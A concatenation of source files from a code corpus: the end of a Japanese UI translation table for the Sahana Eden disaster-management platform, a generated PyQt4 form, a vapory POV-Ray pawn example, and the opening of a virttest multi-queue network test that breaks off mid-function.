'User Profile': 'ユーザープロファイル',
'User Requests': 'ユーザー要求',
'User Updated': 'ユーザーを更新しました',
'User added': 'ユーザーを追加しました',
'User already has this role': 'この権限のあるユーザー',
'User deleted': 'ユーザーを削除しました',
'User updated': 'ユーザーを更新しました',
'User': 'ユーザー',
'Username for authentication at the peer. Note that only HTTP Basic authentication is supported.': 'データ同期先との認証に使うユーザ名。HTTPベーシック認証のみサポートしています。',
'Username': 'ユーザー名',
'Users removed': 'ユーザーを削除しました',
'Users': 'ユーザー',
'Usual food sources in the area': 'この地域の普段の食料調達方法',
'Utilities': 'ユーティリティ',
'Utility, telecommunication, other non-transport infrastructure': 'ユーティリティ、通信、その他のインフラ設備(交通以外)',
'Vacancies': '欠員',
'Value': '値',
'Various Reporting functionalities': '多種多様な報告を行う機能',
'Vehicle Crime': '車両犯罪',
'Vehicle Types': '車両の種別',
'Vehicle': '車両',
'Vendor': 'ベンダー',
'Verification Email sent - please check your email to validate. If you do not receive this email please check you junk email or spam filters': 'メールアドレス確認用のメールを送信しました。メールに記載された確認用URLにアクセスしてください。もしメールが届かない場合迷惑メールフォルダに入ってしまっている可能性がありますのでご確認ください。',
'Verification Status': '認証ステータス',
'Verified': '認証済み',
'Verified?': '認証済みですか?',
'Verify Password': 'パスワード再確認',
'Verify password': 'パスワードの確認',
'Version': 'バージョン',
'Very High': '非常に高い',
'View Alerts received using either Email or SMS': '電子メールまたはSMSで受信したアラートの閲覧',
'View Fullscreen Map': '地図をフルスクリーン表示',
'View Image': '画像の閲覧',
'View On Map': '地図上で閲覧',
'View Outbox': '送信箱の表示',
'View Picture': '写真の表示',
'View Requests for Aid': '援助要請を閲覧',
'View Settings': '設定の確認',
'View Tickets': 'チケットの閲覧',
'View and/or update their details': '詳細の閲覧および更新',
'View or update the status of a hospital.': '病院のステータスの閲覧と更新',
'View pending requests and pledge support.': '処理中の要求と寄付サポートの閲覧',
'View the hospitals on a map.': '病院の場所を地図上で表示します。',
'Village Leader': '村長',
'Village': '村落',
'Visible?': '表示しますか?',
'Visual Recognition': '画像認識',
'Volcanic Ash Cloud': '火山灰雲',
'Volcanic Event': '火山活動',
'Volume - Fluids': '流量 - 液状物',
'Volume - Solids': '流量 - 固形物',
'Volume Capacity': '容量',
'Volume/Dimensions': '容量/外形寸法',
'Volunteer Data': 'ボランティアデータ',
'Volunteer Details': 'ボランティアの詳細',
'Volunteer Management': 'ボランティアの管理',
'Volunteer Project': 'ボランティアプロジェクト',
'Volunteer Registration': 'ボランティア登録',
'Volunteer Registrations': 'ボランティア登録',
'Volunteer Request': 'ボランティア要請',
'Volunteer added': 'ボランティアを追加しました',
'Volunteer deleted': 'ボランティアを削除しました',
'Volunteer details updated': 'ボランティアの詳細を更新しました',
'Volunteer registration added': 'ボランティア登録を追加しました',
'Volunteer registration deleted': 'ボランティア登録を削除しました',
'Volunteer registration updated': 'ボランティア登録を更新しました',
'Volunteers were notified!': 'ボランティアに通知されました',
'Volunteers': 'ボランティア',
'Vote': '投票',
'Votes': '投票',
'WASH': '除染',
'WMS Browser Name': 'WMSブラウザ名',
'WMS Browser URL': 'WMSブラウザのURL',
'Walking Only': '徒歩のみ',
'Walking time to the health service': '医療サービス提供所までの徒歩時間',
'Wall or other structural damage': '壁やその他の構造の損傷',
'Warehouse Details': '倉庫の詳細',
'Warehouse Item Details': '倉庫物資の詳細',
'Warehouse Item added': '倉庫物資を追加しました',
'Warehouse Item deleted': '倉庫内物資を削除しました',
'Warehouse Item updated': '倉庫物資を更新しました',
'Warehouse Items': '倉庫に備蓄中の物資',
'Warehouse Management': '倉庫管理',
'Warehouse added': '倉庫を追加しました',
'Warehouse deleted': '倉庫を削除しました',
'Warehouse updated': '倉庫を更新しました',
'Warehouse': '倉庫',
'Warehouse/Sites Registry': '倉庫/Siteの登録',
'Warehouses': '倉庫',
'WatSan': '給水と衛生',
'Water Level still high?': '水位はまだ高いままですか?',
'Water Sanitation Hygiene': '水質衛生',
'Water collection': '給水',
'Water gallon': 'ガロン容器',
'Water storage containers available for HH': '世帯用の水貯蔵容器が利用可能である',
'Water storage containers in households': '世帯の水貯蔵容器',
'Water storage containers sufficient per HH': '世帯毎に1つ以上の水貯蔵容器が利用可能である',
'Water supply': '水の供給',
'Water': '水',
'Waterspout': '水上竜巻',
'Way Bill(s)': '貨物運送状',
'We have tried': '私達は試行しました',
'Website': 'ウェブサイト',
'Wednesday': '水曜日',
'Weekly': '週次',
'Weight (kg)': '体重 (kg)',
'Weight': '体重',
'Welcome to the Sahana Eden Disaster Management Platform': 'Sahana Eden -災害情報管理プラットフォームへようこそ',
'Welcome to the Sahana Eden Disaster Management System': 'Sahana Eden -災害情報管理システムへようこそ',
'Welcome to the Sahana Portal at ': 'Sahana ポータルへようこそ: ',
'Welcome to the Sahana Portal at': 'Sahanaポータルにようこそ',
'Well-Known Text': 'Well-Known Text(WKT)',
'Were basic medical supplies available for health services prior to the disaster?': '災害前に、基本的な医療サービスが機能していたかどうかを記載してください',
'Were breast milk substitutes used prior to the disaster?': '災害前に利用していた母乳代用品の入手源を記載してください',
'Were there cases of malnutrition in this area prior to the disaster?': 'この地域で、災害前に栄養失調が発生していたかどうかを記載してください',
'Were there health services functioning for the community prior to the disaster?': '災害前、共同体でヘルスサービスが機能していたかどうかを記載してください',
'Were there reports or evidence of outbreaks of any micronutrient malnutrition disorders before the emergency?': '災害発生前から栄養失調の報告があった、あるいはその証跡があったかどうかを記載します',
'What are the factors affecting school attendance?': '生徒の就学状況に影響する要因を記載してください',
'What are your main sources of cash to restart your business?': 'ビジネス再開に必要な現金の、主な調達源を記載してください',
'What are your main sources of income now?': '現在の主な収入源を記載してください',
'What do you spend most of your income on now?': '現在の主な支出要因を記載してください',
'What food stocks exist? (main dishes)': '備蓄食料の種類(主皿)',
'What food stocks exist? (side dishes)': '備蓄食料の種類(副皿)',
'What is the estimated total number of people in all of these institutions?': '上記施設内の居住者を総計すると、おおよそどの程度になるかを記載してください',
'What is your major source of clean water for daily use (ex: washing, cooking, bathing)?': '洗濯、料理、入浴など、日常生活で必要となる清潔な水の、主な入手源を記載してください',
'What is your major source of drinking water?': '飲料水の主な入手源を記載してください',
'What type of latrines are available in the village/IDP centre/Camp?': '村落/IDPセンター/仮泊施設内で利用可能なトイレのタイプは?',
'What type of salvage material can be used from destroyed houses?': '全壊した家屋から回収した部材が流用可能な用途を記載します',
'What type of salvage material can be used from destroyed schools?': '倒壊した校舎において、再利用できる部材は何ですか?',
'What types of health problems do children currently have?': '小児が現在抱えている健康問題のタイプを記載してください',
'What types of health problems do people currently have?': '住人たちが現在抱えている健康問題のタイプを記載してください',
'What types of health services are still functioning in the affected area?': '現在、被災地で機能しているヘルスサービスの種類を選択してください',
'What types of household water storage containers are available?': '世帯で使っている水貯蔵容器のタイプを選択してください',
'What were your main sources of income before the disaster?': '災害発生前の主な収入源を選択してください',
'Wheat': '小麦',
'When a map is displayed that focuses on a collection of points, the map is zoomed to show just the region bounding the points. This value adds a small mount of distance outside the points. Without this, the outermost points would be on the bounding box, and might not be visible.': '地図上に複数のポイントが表示されている場合、それらポイント全てを表示できる縮尺で地図が表示されます。この値は、それらポイントの外に余白を付与します。指定しない場合、表示領域とポイントが重なり、表示範囲から外れてしまう可能性があります。',
'When a map is displayed that focuses on a collection of points, the map is zoomed to show just the region bounding the points. This value gives a minimum width and height in degrees for the region shown. Without this, a map showing a single point would not show any extent around that point. After the map is displayed, it can be zoomed as desired.': '地図上に複数のポイントが表示されている場合、それらポイント全てを表示できる縮尺で地図が表示されます。この値は、地域を表示する際の横幅と縦高の最小値となります。指定しない場合、対象の一点のみ表示され、その周辺は表示されません。一度表示された後であれば、縮尺の変更が可能です。',
'When a map is displayed that focuses on a collection of points, the map is zoomed to show just the region bounding the points.': '地点の集合にフォーカスを合わせた地図を表示すると、この地図はそれら地点の集合を表示できる範囲に拡大・縮小します',
'When reports were entered': 'いつ報告が入力されたか',
'Where are the alternative places for studying?': '学校以外で、学習が可能な施設の種類を選択してください',
'Where are the separated children originally from?': '保護者が居ない児童の住居地はどこですか?',
'Where do the majority of people defecate?': 'トイレはどこで済ませますか?',
'Where have the children been sent?': '疎開先の情報がある場合は記載してください',
'Where is solid waste disposed in the village/camp?': '村落/仮泊施設内での、固形廃棄物処理場所を記載してください',
'Whether this is a Sahana Eden, Sahana Agasti, Ushahidi or Other instance.': 'Sahana Eden, Sahana Agasti, Ushahidi あるいは他のシステムの場合も',
'Whiskers': 'ほおひげ',
'Who is doing what and where': '誰がどこで何をしているか',
'Who usually collects water for the family?': '日頃、家族のために水を採取しているのは誰か?',
'Width': '横幅',
'Wild Fire': '野火',
'Wind Chill': '風速冷却',
'Window frame': 'ウィンドウ枠',
'Winter Storm': '吹雪',
'Without mentioning any names or indicating anyone, do you know of any incidents of violence against women or girls occuring since the disaster?': '災害発生後、女性や少女に対する暴力事件が発生したかどうかを記載してください。具体的な人名や場所を記載する必要はありません',
'Women of Child Bearing Age': '出産年齢の女性',
'Women participating in coping activities': '女性が災害対応に従事',
'Women who are Pregnant or in Labour': '妊娠中、あるいは分娩中の女性',
'Womens Focus Groups': '女性のフォーカスグループ(Womens Focus Groups)',
'Wooden plank': '木製板',
'Wooden poles': '木製の柱',
'Working hours end': '作業終了時刻',
'Working hours start': '作業開始時刻',
'Working or other to provide money/food': '金銭/食料調達のため就労、あるいは活動を実施',
'Would you like to display the photos on the map?': '地図上に写真を表示しますか?',
'X-Ray': 'X線',
'Year built': '建築年',
'Year of Manufacture': '製造年',
'Yellow': '黄色',
'Yes': 'はい',
'You are a recovery team?': 'あなたが遺体回収チームの場合',
'You are attempting to delete your own account - are you sure you want to proceed?': '自分のアカウントを削除しようとしています。本当に削除しますか?',
'You are currently reported missing!': 'あなたが行方不明者として登録されています!',
'You can change the configuration of synchronization module in the Settings section. This configuration includes your UUID (unique identification number), sync schedules, beacon service and so on. Click the following link to go to the Sync Settings page.': '同期に関する設定は、「設定」セクションで行うことができます。設定には、UUID(unique identification number)、同期スケジュール、ビーコンサービス等が含まれます。同期設定は以下のリンクから変更可能です。',
'You can click on the map below to select the Lat/Lon fields': '下の地図をクリックすることで、緯度経度情報を入力できます',
'You can click on the map below to select the Lat/Lon fields:': '緯度と経度の設定は、以下の地図をクリックすることでも可能です:',
'You can click on the map to select the Lat/Lon fields. Longitude is West - East (sideways). Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere. Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas. This needs to be added in Decimal Degrees.': '経度/緯度の項目は、地図を選択することでも登録可能です。経度は東西方向(横)の座標軸です。緯度は南北方向(上下)の座標軸です。赤道ではゼロ、北半球ではプラス、南半球ではマイナスとなります。経度は、子午線(グリニッジ標準時)をゼロとして、東(ヨーロッパ、アジア)がプラスとなります。西(大西洋、アメリカ)がマイナスです。10進法で記入してください。',
'You can select the Draw tool (': '選択可能な描画ツール (',
'You can select the Draw tool': 'ドローツールを選択できます',
'You can set the modem settings for SMS here.': 'SMS用モデムの設定をすることができます。',
'You can use the Conversion Tool to convert from either GPS coordinates or Degrees/Minutes/Seconds.': '変換ツールを使うことで、GPS、あるいはDegrees/Minutes/Seconds形式からデータを変換できます。',
'You do no have permission to cancel this received shipment.': '輸送の受け取りをキャンセルする権限がありません',
'You do no have permission to cancel this sent shipment.': '輸送の送付をキャンセルする権限がありません',
'You do no have permission to make this commitment.': 'このコミットを作成する権限がありません',
'You do no have permission to receive this shipment.': 'この輸送を受け取る権限がありません',
'You do no have permission to send this shipment.': 'この輸送を開始する権限がありません',
'You do not have permission for any site to add an inventory item.': 'あなたには他の場所から在庫アイテムを追加する権限はありません',
'You do not have permission for any site to make a commitment.': 'どの場所にも受け入れを示す権限が有りません。',
'You do not have permission for any site to make a request.': '支援要請を作成する権限がありません',
'You do not have permission for any site to perform this action.': 'この操作をするための権限がありません',
'You do not have permission for any site to receive a shipment.': '物資の輸送を受け取る権限がありません',
'You do not have permission for any site to send a shipment.': '物資の輸送をする権限がありません',
'You do not have permission to send a shipment from this site.': 'あなたはこのサイトから物資を送る権限はありません',
'You have a personal map configuration. To change your personal configuration, click ': '個人用地図設定があります。あなたの個人用地図設定を編集するにはクリックしてください',
'You have found a dead body?': '遺体を発見しましたか?',
'You must be logged in to register volunteers.': 'ボランティアとして登録するには、ログインする必要があります',
'You must be logged in to report persons missing or found.': '行方不明者の発見状況を登録するには、ログインする必要があります。',
'You must provide a series id to proceed.': '処理を行うにはシリーズIDを指定する必要があります。',
'You should edit OpenStreetMap settings in models/000_config.py': 'OpenStreetMapの設定を変更するには、models/000_config.pyを編集してください',
'You should edit Twitter settings in models/000_config.py': 'Twitter設定を変更するには、models/000_config.pyを編集してください。',
'Your Account is Approved - you can now login\n %s%s/': '利用者登録が完了しました。リンク先のログインページで あなたが登録したユーザー名とパスワードを入力してログインしてください。\n %s%s/',
'Your Account is Approved': '利用者登録が完了しました',
'Your action is required. Please approve user %s asap: ': 'あなたの行動が要求されています。ただちにユーザー %s を承認してください。',
'Your action is required. Please approve user': 'ユーザーから承認の依頼が届いています。承諾お願いします',
'Your current ordered list of solution items is shown below. You can change it by voting again.': '解決項目の順番付きリストは以下です。再度投票することによって変更可能です。',
'Your post was added successfully.': '投稿が成功しました',
'Your system has been assigned a unique identification (UUID), which other computers around you can use to identify you. To view your UUID, you may go to Synchronization -> Sync Settings. You can also see other settings on that page.': 'あなたがお使いのシステムには、ユニークID (UUID) が割り当てられており、このIDを用いて他のコンピュータがあなたのシステムを同定します。あなたの UUID を閲覧するには、同期 -> 同期設定と進んでください。そのページでは、他の設定を閲覧することもできます。',
'ZIP/Postcode': '郵便番号',
'Zinc roof': 'トタン屋根',
'Zoom In: click in the map or use the left mouse button and drag to create a rectangle': 'ズームイン: マップをクリックするか、拡大したい場所をドラッグで選択してください',
'Zoom Levels': 'ズームレベル',
'Zoom Out: click in the map or use the left mouse button and drag to create a rectangle': 'ズームアウト: マップをクリックするか、拡大したい地点をマウスの左ボタンでドラッグしてください',
'Zoom to Current Location': '現在の場所を拡大',
'Zoom to maximum map extent': 'マップの最大範囲までズーム',
'Zoom': 'ズーム',
'act': '活動',
'active': 'アクティブ',
'added': '追加しました',
'all records': '全てのレコード',
'allows a budget to be developed based on staff & equipment costs, including any admin overheads.': 'では、スタッフや設備、それらの管理コストまで含めた予算編成を行ないます。',
'allows for creation and management of surveys to assess the damage following a natural disaster.': '自然災害による被災影響調査の作成、および管理を許可する',
'an individual/team to do in 1-2 days': '個人やチーム単位で、1-2日中に実施するべき事柄をさします。',
'approved': '承認された',
'assigned': '担当者・部門が確定',
'average': '平均的',
'black': '黒',
'blond': 'ブロンド',
'blue': '青',
'brown': '茶色',
'business_damaged': 'ビジネスへの損害',
'by': ' ',
'c/o Name': 'c/o 名前',
'can be used to extract data from spreadsheets and put them into database tables.': 'スプレッドシートからデータを抽出して、データベーステーブルに挿入できます。',
'can use this to identify the Location': 'ここからロケーションの特定が可能です',
'caucasoid': '白人',
'check all': '全てチェック',
'click for more details': '詳細はクリック',
'collateral event': '付帯イベント',
'completed': '完了',
'confirmed': '確認済',
'consider': '考慮',
'criminal intent': '犯罪目的',
'crud': '性病',
'curly': '縮れ毛',
'currently registered': '登録済み',
'daily': '日次',
'dark': '濃い',
'data uploaded': 'データがアップロードされました',
'database %s select': 'データベース%sの選択',
'database': 'データベース',
'db': 'データベース',
'delete all checked': 'チェックされた項目を全て削除',
'deleted': '削除されました',
'denied': '拒否されました',
'description': '説明',
'design': 'デザイン',
'diseased': '罹患中',
'displaced': '避難中',
'divorced': '離別',
'done!': '完了!',
'duplicate': '重複',
'edit': '編集',
'editor': '編集者',
'eg. gas, electricity, water': 'ガス、電気、水道など',
'embedded': '埋め込まれた',
'enclosed area': '専用地',
'export as csv file': 'csvファイルとしてエクスポート',
'fat': '肥満',
'feedback': '現地からの要望',
'female': '女性',
'final report': '最終報告書',
'flush latrine with septic tank': '浄化槽つき水洗トイレ',
'follow-up assessment': 'アセスメントのフォローアップ',
'food_sources': '食糧供給源',
'forehead': 'ひたい',
'form data': 'フォームデータ',
'from Twitter': 'Twitter経由',
'full': '完全',
'getting': '取得中',
'green': '緑',
'grey': '灰色',
'here': 'ここ',
'high': '高い',
'hourly': '1時間毎',
'households': '世帯情報',
'human error': 'ヒューマンエラー',
'identified': '身元確認済み',
'ignore': '無視する',
'immediately': '即応',
'in Deg Min Sec format': 'Deg Min Sec フォーマットで',
'in GPS format': 'GPS フォーマットで',
'in Inv.': '個',
'inactive': '休止中',
'initial assessment': '初期アセスメント',
'injured': '負傷中',
'insert new %s': '%sの新規挿入',
'insert new': '新規挿入',
'invalid request': '無効な要求',
'invalid': '無効',
'is a central online repository where information on all the disaster victims and families, especially identified casualties, evacuees and displaced people can be stored. Information like name, age, contact number, identity card number, displaced location, and other details are captured. Picture and finger print details of the people can be uploaded to the system. People can also be captured by group for efficiency and convenience.': 'は、災害犠牲者とその家族、特に身元の判明した遺体、避難者、難民など、全ての情報を集約可能な中央オンラインレポジトリです。名前、年齢、連絡先番号、IDカード番号、避難した場所、その他の詳細が記録されます。人物の写真や指紋をアップロードすることができます。効率性と利便性のため、人物をグループ分けすることができます。',
'is envisioned to be composed of several sub-modules that work together to provide complex functionality for the management of relief and project items by an organization. This includes an intake system, a warehouse management system, commodity tracking, supply chain management, fleet management, procurement, financial tracking and other asset and resource management capabilities': 'は、支援団体による救援活動や復興プロジェクトの作業を管理するために、複数のサブモジュールを組み合わせて高度な機能を実現しようと考えており、物資の受け入れ、貯蔵設備の管理、必要な物資の記録、サプライチェーン・マネジメント、輸送管理、調達、財務記録、その他様々な資産やリソースの管理といった機能を備えています',
'keeps track of all incoming tickets allowing them to be categorised & routed to the appropriate place for actioning.': '全ての入荷伝票を追跡することで、カテゴリー分けや適切な実行場所への配分を行う',
'kilogram': 'キログラム',
'kit': 'キット',
'latrines': 'トイレ',
'leave empty to detach account': 'アカウントを取り外すには空欄のままにしてください',
'legend URL': '凡例の URL',
'light': '淡い',
'liter': 'リットル',
'locations': 'ロケーション',
'login': 'ログイン',
'long': '長い',
'long>12cm': '12cm以上',
'low': '低い',
'male': '男性',
'manual': 'マニュアル',
'married': '既婚',
'max': '最大',
'maxExtent': '最大範囲',
'maxResolution': '最高分解能',
'medium': '中',
'medium<12cm': '12cm未満',
'menu item': 'メニューアイテム',
'message_id': 'メッセージID',
'meter cubed': '立方メートル',
'meter': 'メートル',
'meters': 'メートル',
'min': '最小',
'module allows the an inspector to fill information for buildings.': 'モジュールでは、建築物の調査情報を記録できます。',
'module allows the site administrator to configure various options.': 'モジュールを使うことで、サイト管理者が様々な項目を設定する際の手間を省くことができます。',
'module helps monitoring the status of hospitals.': 'モジュールでは、病院の状態をモニタできます。',
'module provides a mechanism to collaboratively provide an overview of the developing disaster, using online mapping (GIS).': 'モジュールでは、オンラインマッピング(GIS)を使用して、現在の災害地域の状態を俯瞰することができます。',
'mongoloid': '黄色人種',
'more': 'その他の項目 ',
'n/a': 'データなし',
'natural hazard': '自然災害',
'negroid': '黒人',
'never': 'まだ',
'new ACL': '新規ACL',
'new record inserted': '新規レコードを挿入しました',
'new': '新規登録',
'next 100 rows': '次の100行',
'no': ' ',
'none': 'なし',
'normal': '通常',
'not accessible - no cached version available!': 'アクセスできません - キャッシュされたバージョンがありません!',
'not accessible - using cached version from': 'アクセス不可 - キャッシュ版を使用しています',
'not specified': '未指定',
'num Zoom Levels': 'ズーム倍率',
'obsolete': '孤立中',
'on': ' ',
'once': '一度',
'open defecation': '野外',
'operational intent': '運用目的',
'or import from csv file': 'またはcsvファイルからインポート',
'other': 'その他',
'over one hour': '1時間以上',
'pack of 10': '10のパック',
'people': '居住者情報',
'piece': 'ピース(単位)',
'pit latrine': '穴掘りトイレ',
'pit': '堀穴',
'postponed': '実施を延期',
'preliminary template or draft, not actionable in its current form': '現行フォーム内で実用的でない予備テンプレートまたはドラフト',
'previous 100 rows': '前の100行',
'primary incident': '優先すべきインシデント',
'problem connecting to twitter.com - please refresh': 'twitter.comへの接続に問題が発生しました。再読込を行ってください',
'provides a catalogue of digital media.': 'デジタルメディアのカタログを提供します',
'record does not exist': 'レコードが存在しません',
'record id': 'レコードID',
'records deleted': 'レコードを削除しました',
'red': '赤い',
'reported': '報告済み',
'reports successfully imported.': 'レポートは正しくインポートできました',
'representation of the Polygon/Line.': 'Polygon/Lineの表現',
'retired': '終了',
'retry': '再試行',
'river': '河川',
'sack 20kg': '袋 20kg',
'sack 50kg': '袋 50kg',
'secondary effect': '副次効果',
'see comment': 'コメント参照',
'selected': '選択された',
'separated from family': '家族とはぐれた',
'separated': '別居',
'shaved': '坊主',
'shift_start': 'シフト開始',
'short': '小柄',
'short<6cm': '6cm未満',
'sides': '側面',
'sign-up now': '今すぐ登録',
'simple': '単純な',
'single': '独身',
'slim': 'やせ型',
'specify': '明記してください',
'staff': 'スタッフ',
'state location': 'ステートロケーション',
'state': '状態',
'straight': '直毛',
'suffered financial losses': '経済的損失',
'table': 'テーブル',
'table_name': 'テーブル名',
'tall': '大柄',
'technical failure': '技術的な原因',
'this': 'この',
'times and it is still not working. We give in. Sorry.': '回繰り返しましたが、処理を完了できません。ご迷惑をおかけしますが、処理を中止します。',
'to access the system': 'してシステムにアクセスしてください',
'ton': 'トン',
'tonsure': '剃髪',
'total': '合計',
'tracks all shelters and stores basic details regarding them. It collaborates with other modules to track people associated with a shelter, the services available etc.': '避難所を追跡し、それらの詳細を蓄積します。避難所に関連付けられた人、利用可能なサービス等の他のモジュールと協業します。',
'tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!': '実行中のPythonで tweepyモジュールが利用できません。Tropo以外でのTwitter機能利用で必要です',
'unable to parse csv file': 'csvファイルをパースできません。',
'unapproved': '承認されていない',
'uncheck all': 'チェックをすべて外す',
'unidentified': '詳細不明',
'uninhabitable = foundation and structure destroyed': '利用不可能 = 基礎構造や土台部分の破壊など',
'unknown': '不明',
'unspecified': 'その他',
'unverified': '未検証',
'updated': '更新しました',
'updates only': '更新のみ',
'urgent': '緊急',
'using default': '標準値を使用',
'verified': '確認済み',
'volunteer': 'ボランティア',
'wavy': '波状',
'weekly': '週次',
'white': '白',
'wider area, longer term, usually contain multiple Activities': '活動範囲が広く、長期的目標を有しており、複数の支援活動を包括します。',
'widowed': '死別',
'window': '窓',
'windows broken, cracks in walls, roof slightly damaged': '窓破損、壁にひび割れ、屋根の一部損傷',
'within human habitat': '人間の居住地域内',
'xlwt module not available within the running Python - this needs installing for XLS output!': '実行中のPythonでxlwtモジュールが利用できません。XLS出力に必要です。',
'yes': 'はい',
}
|
bobrock/eden
|
languages/ja.py
|
Python
|
mit
| 353,167
|
# -*- coding: utf-8 -*-
from __future__ import print_function
# Form implementation generated from reading ui file './acq4/analysis/old/StdpCtrlTemplate.ui'
#
# Created: Tue Dec 24 01:49:15 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_StdpCtrlWidget(object):
def setupUi(self, StdpCtrlWidget):
StdpCtrlWidget.setObjectName(_fromUtf8("StdpCtrlWidget"))
StdpCtrlWidget.resize(227, 321)
self.gridLayout = QtGui.QGridLayout(StdpCtrlWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(StdpCtrlWidget)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.thresholdSpin = QtGui.QDoubleSpinBox(StdpCtrlWidget)
self.thresholdSpin.setObjectName(_fromUtf8("thresholdSpin"))
self.gridLayout.addWidget(self.thresholdSpin, 0, 1, 1, 2)
self.label_2 = QtGui.QLabel(StdpCtrlWidget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.durationSpin = QtGui.QSpinBox(StdpCtrlWidget)
self.durationSpin.setObjectName(_fromUtf8("durationSpin"))
self.gridLayout.addWidget(self.durationSpin, 1, 1, 1, 2)
self.label_4 = QtGui.QLabel(StdpCtrlWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 2, 0, 1, 1)
self.slopeWidthSpin = SpinBox(StdpCtrlWidget)
self.slopeWidthSpin.setObjectName(_fromUtf8("slopeWidthSpin"))
self.gridLayout.addWidget(self.slopeWidthSpin, 2, 1, 1, 2)
self.apExclusionCheck = QtGui.QCheckBox(StdpCtrlWidget)
self.apExclusionCheck.setObjectName(_fromUtf8("apExclusionCheck"))
self.gridLayout.addWidget(self.apExclusionCheck, 3, 0, 1, 1)
self.label_3 = QtGui.QLabel(StdpCtrlWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 4, 0, 1, 2)
self.apthresholdSpin = QtGui.QDoubleSpinBox(StdpCtrlWidget)
self.apthresholdSpin.setObjectName(_fromUtf8("apthresholdSpin"))
self.gridLayout.addWidget(self.apthresholdSpin, 4, 2, 1, 1)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 5, 0, 1, 1)
self.retranslateUi(StdpCtrlWidget)
QtCore.QMetaObject.connectSlotsByName(StdpCtrlWidget)
def retranslateUi(self, StdpCtrlWidget):
StdpCtrlWidget.setWindowTitle(_translate("StdpCtrlWidget", "Form", None))
self.label.setText(_translate("StdpCtrlWidget", "PspThreshold:", None))
self.label_2.setText(_translate("StdpCtrlWidget", "Post-stim Duration (ms):", None))
self.label_4.setText(_translate("StdpCtrlWidget", "Slope width:", None))
self.apExclusionCheck.setText(_translate("StdpCtrlWidget", "Exclude APs", None))
self.label_3.setText(_translate("StdpCtrlWidget", "Exclusion Threshold (mV):", None))
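# Note (added comment): SpinBox is a promoted custom widget, and pyuic emits
# imports for promoted widgets at the end of the generated module, which is
# why the import below appears after the class definition.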
from SpinBox import SpinBox
|
meganbkratz/acq4
|
acq4/analysis/old/StdpCtrlTemplate.py
|
Python
|
mit
| 3,654
|
""" Just a purple sphere """
from vapory import *
objects = [
# SUN
LightSource([1500,2500,-2500], 'color',1),
# SKY
Sphere( [0,0,0],1, 'hollow',
Texture(
Pigment( 'gradient', [0,1,0],
'color_map{[0 color White] [1 color Blue ]}'
'quick_color', 'White'
),
Finish( 'ambient', 1, 'diffuse', 0)
),
'scale', 10000
),
# GROUND
Plane( [0,1,0], 0 ,
Texture( Pigment( 'color', [1.1*e for e in [0.80,0.55,0.35]])),
Normal( 'bumps', 0.75, 'scale', 0.035),
Finish( 'phong', 0.1 )
),
# PAWN
Union( Sphere([0,1,0],0.35),
Cone([0,0,0],0.5,[0,1,0],0.0),
Texture( Pigment( 'color', [1,0.65,0])),
Finish( 'phong', 0.5)
)
]
scene = Scene( Camera( 'ultra_wide_angle',
'angle',45,
'location',[0.0 , 0.6 ,-3.0],
'look_at', [0.0 , 0.6 , 0.0]
),
objects= objects,
included=['colors.inc']
)
scene.render('pawn.png', remove_temp=False)
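# Added note: remove_temp=False appears to keep the intermediate .pov scene
# file that vapory generates, which is convenient for inspecting the raw
# POV-Ray source of this example.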
|
eelcovv/vapory
|
examples/pawn.py
|
Python
|
mit
| 1,312
|
import logging
import re
import aexpect
from autotest.client import utils
from autotest.client.shared import error
from virttest import utils_net
from virttest import utils_test
from virttest import utils_misc
@error.context_aware
def run(test, params, env):
"""
MULTI_QUEUE change queues number test
1) Boot up VM, and login guest
2) Check guest pci msi support and reset it as expected
3) Enable the queues in guest
4) Run bg_stress_test(pktgen, netperf or file copy) if needed
5) Change queues number repeatedly while the stress test is running
6) Ping external host (local host, if external host not available)
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def change_queues_number(session, ifname, q_number, queues_status=None):
"""
Set the combined queue count via 'ethtool -L', check the exit status against expectations, and return the updated [max, current] queue status.
"""
mq_set_cmd = "ethtool -L %s combined %d" % (ifname, q_number)
if not queues_status:
queues_status = get_queues_status(session, ifname)
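# Added note: the request is only expected to succeed (exit status 0) when it
# actually changes the current combined count, stays within the reported
# maximum and is positive; otherwise ethtool should fail (exit status 1).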
if (q_number != queues_status[1] and q_number <= queues_status[0] and
q_number > 0):
expect_status = 0
else:
expect_status = 1
status, output = session.cmd_status_output(mq_set_cmd)
cur_queues_status = get_queues_status(session, ifname)
if status != expect_status:
err_msg = "Change queues number failed, "
err_msg += "current queues set is %s, " % queues_status[1]
err_msg += "max allow queues set is %s, " % queues_status[0]
err_msg += "when run cmd: '%s', " % mq_set_cmd
err_msg += "expect exit status is: %s, " % expect_status
err_msg += "output: '%s'" % output
raise error.TestFail(err_msg)
if not status and cur_queues_status == queues_status:
raise error.TestFail("params is right, but change queues failed")
elif status and cur_queues_status != queues_status:
raise error.TestFail("No need change queues number")
return [int(_) for _ in cur_queues_status]
def get_queues_status(session, ifname, timeout=240):
"""
Return the [maximum, current] combined queue counts reported by 'ethtool -l'.
"""
mq_get_cmd = "ethtool -l %s" % ifname
nic_mq_info = session.cmd_output(mq_get_cmd, timeout=timeout)
queues_reg = re.compile(r"Combined:\s+(\d)", re.I)
